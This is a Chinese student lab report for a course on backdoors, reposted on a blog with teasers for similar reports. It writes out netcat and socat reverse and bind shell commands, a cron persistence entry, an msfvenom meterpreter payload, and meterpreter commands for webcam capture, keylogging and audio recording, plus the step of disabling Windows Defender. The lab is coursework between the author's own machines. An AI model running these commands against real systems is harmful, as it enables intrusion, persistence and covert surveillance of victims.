2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践

最新推荐文章于 2024-09-23 09:53:50 发布
最新推荐文章于 2024-09-23 09:53:50 发布
阅读量103 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/wyb-1998/p/10588406.html
版权

2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践

实验内容

使用netcat获取主机操作Shell,cron启动

使用Socat获取主机操作Shell, 任务计划启动

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

常用后门工具

Netcat参考资料

Socat参考资料

基础问题

例举你能想到的一个后门进入到你系统中的可能方式?

答:收到虚假邮件,下载邮件的附件

例举你知道的后门如何启动起来(win及linux)的方式?

答:通过修改注册表设置为开机自启动;进入挂马网站

Meterpreter有哪些给你映像深刻的功能?

答:开启摄像头,录制音频等操作。

如何发现自己有系统有没有被安装后门?

答:开启防火墙;下载专业的杀毒软件

实验过程
一 windows下获得一个linux shell

1 在Linux中使用ifconfig查看Linux的ip地址
1296533-20190324151826007-1023225545.png

2 在Windows中使用ipconfig查看本机ip地址
1296533-20190324151839475-1355445539.png

3 windowsncatexe -l -p 5219打开监听,Linuxnc ip 5219 -e /bin/sh反弹连接win,并且在Windows cmd查看是否成功

1296533-20190324151859902-1932374477.png
1296533-20190324151916282-909094630.png

二 Linux 下获得Windows的cmd程序

1 Linux运行监听指令nc -l -p 5219

2 Windows反弹连接Linuxncat.exe -e cmd.exe ip 5219
1296533-20190324152001534-1064758550.png

3 在Linux shell下使用dir命令
1296533-20190324152010555-2068779819.png

三 在Linux与Windows之间进行数据传送

1 在windows下输入命令:ncat.exe -l 5219,实现监听5219端口

2 Kali下输入ncat ip,连接到windows端口
1296533-20190324152042997-1483643528.png
1296533-20190324152134476-2020298429.png

四使用netcat获取主机操作Shell,cron启动

1 windows端下,输入命令ncat.exe -l -p 5219,监听本机的5219端口

2 kali端下,输入crontab -e,实现编辑一条定时任务。

3 插入* * * * /bin/netcat ip -e /bin/sh
1296533-20190324152230961-1645633341.png

4 保存退出,crontab -l查看
1296533-20190324152203323-767018528.png

五 使用socat获取主机操作Shell, 任务计划启动

1 win10系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务

2 填写任务名称:20165219
1296533-20190324152258416-1835427120.png

3 新建触发器
1296533-20190324152312791-1243547600.png

4 新建操作
1296533-20190324152326442-34053244.png

5 导入socat.exe的路径,并添加参数:tcp-listen:5219 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5219,同时把cmd.exe的stderr重定向到stdout上)

6 锁定计算机,再次打开,运行任务。
1296533-20190324152341945-1609823842.png

7 在Linux shell中输入socat - tcp:ip:5219
1296533-20190324152400187-1013158933.png

六 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1 kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=5219 -f exe > 20165219_backdoor.exe
1296533-20190324152454870-2132363546.png

2 Windows中使用ncat.exe -lv5219 > 20165219_backdoor.exe

3 Linux中输入nc ip < 20165219_backdoor.exe
在ncat文件夹下查看
1296533-20190324152519068-524816724.png

4 使用msfconsole进入msf控制台

5 进行一系列的设置
1296533-20190324152633260-1837171657.png

6 运行后门程序

七 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1webcam_snap可以使用摄像头拍照
1296533-20190324152656539-983237372.png

2 使用creenshot可以进行截屏
1296533-20190324152719234-1250119746.png

3 keyscan_start 记录下击键的过程
1296533-20190324152729805-694499288.png

4 record_mic可以截获一段音频
1296533-20190324152740293-151080577.png

八 遇到的问题

运行后门程序的时候, cMd拒绝访问,双击文件也不可以运行,关掉防火墙也不行 。

解决:把win10 控制面板中的 windows defender安全中心中的病毒威胁和防护功能关掉
1296533-20190324152748548-172566272.png

九 实验体会

通过这次实验明白了后门的原理。同时也增强了安全防护的意识,实验内容很有趣。

转载于:https://www.cnblogs.com/wyb-1998/p/10588406.html

weixin_30498807
关注
2018-2019-2 20165114《网络对抗技术Exp2 后门原理实践
weixin_30493321的博客
03-21 185
目录 一、实验准备 二、实验内容 三、基础问题回答 四、实验过程及步骤 五、实验总结与体会 六、实验中遇到的问题与错误。 一、实验准备 1、后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 一个相对狭义一点的后门的概念: 特指潜伏于操作系统中专门做...
2018-2019~3 20165107 《网络对抗技术Exp2 后门原理实践
weixin_30822451的博客
03-23 160
20165107 《网络对抗技术Exp2 后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机...
2018-2019-2 20165217《网络对抗技术Exp2 后门原理实践
diaominduo4849的博客
03-24 144
2018-2019-2 20165217《网络对抗技术Exp2 后门原理实践 实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机...
2018-2019-2 网络对抗技术 20165304 Exp2 后门原理实践
denglina2514的博客
03-21 165
后门的基本概念及实验内容 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或soca...
2018-2019-2 《网络对抗技术Exp2 后门原理实践
aide0383的博客
03-23 209
2018-2019-2 《网络对抗技术Exp2 后门原理实践 1. 后门原理实践实验说明及预备知识 一、实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取...
2018-2019-2 网络对抗技术 20165219 Exp3 免杀原理实践
weixin_30901729的博客
03-31 105
2018-2019-2 网络对抗技术 20165219 Exp3 免杀原理实践 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 2 通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 3 用另一电脑实...
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理实践
weixin_33895016的博客
03-20 306
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF ...
2018-2019-2 20165234 《网络对抗技术Exp2 后门原理实践
a5251703897的博客
03-24 201
实验二后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录...
2018-2019-2 20165315《网络对抗技术Exp2 后门原理实践
weixin_34414650的博客
03-19 198
2018-2019-2 20165315《网络对抗技术Exp2 后门原理实践 一、实验任务 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、...
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 414
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 393
一、原理实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
网络对抗技术-Exp4-恶意代码分析 20181314
weixin_46014245的博客
04-07 506
一、原理实践说明 1.实践目标 2.实践内容概述 3.基础问题回答 二、实践过程记录 任务一:使用schtasks指令监控系统 任务二:使用sysmon工具监控系统 任务三:恶意软件分析 使用VirusTotal分析恶意软件 使用PEiD分析恶意软件 使用PE Explorer分析恶意软件 使用Process Monitor分析恶意软件 使用Process Explorer分析恶意软件 使用systracer分析恶意软件 使用Wireshark分析恶意软件 三、实验遇到的问题及解决方法 四、实验总结与体会
20204323太晓梅 网络对抗技术 exp2 后门原理实践
m0_57567318的博客
03-24 198
但是我在前期仍然是遇到了很多问题,以前我总是会下意识的向别人求助,但是在本次实验中由于我碰到的问题我周围的人都没有遇到类似的,我想到老师视频中也是遇到了很多困难,但是都是通过自己的各种猜想去判断检查,上网查看解决方法,老师上课时也举例子讲了一些简单的排查流程。但由于前期耗费了大量的时间,后面在对于meterpreter的使用理解的不是很到位,只是参考别人的实验代码理解和使用命令行进行操作,对其内部的机理了解不深,本来想尝试做一下加分项的,但是最后放弃了,在这点上我还需要提高。后门便是其中的一种。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1213
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Linux三剑客(grep、sed、awk)【三、awk】
最新发布
qq_44799103的博客
09-23 475
awk 必须 外层单引号,内层双引号内置变量 $1 $2 都不得加双引号,否则会识别为文本,尽量别加引号awk '{print "第一列:" $1, "第二列:" $2}' tmp.txt",name}'laomao#间接引用shell变量。
Linux Vim编辑器常用命令
Calvin的博客
09-19 341
命令模式快捷键 编辑/输入模式快捷键 编辑模式切换到命令模式
【Linux:共享内存】
2201_75755162的博客
09-19 542
共享内存不随着进程的结束就释放,因为共享内存不属于进程而属于操作系统,需要手动释放或者后续其它系统调用。共享内存的生命周期随内核。
[Linux] Linux进程PCB内部信息的深入理解
水墨不写bug
09-21 1107
[Linux] Linux进程PCB内部信息的深入理解: 一.查看进程 二.认识并了解进程的关键信息 I,PID/PPID II,exe III,cwd 三、fork()创建进程
MSP-EXP430G2串行通信入门与开发板简介
本文档主要介绍了如何在MSP-EXP430G2开发板上利用串行通信功能进行系统调试和数据交换。MSP-EXP430G2是一款低成本的开发板,专为TI公司的MSP430G2xx系列设计,它提供了全面的开发解决方案,包括USB集成仿真器、DIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值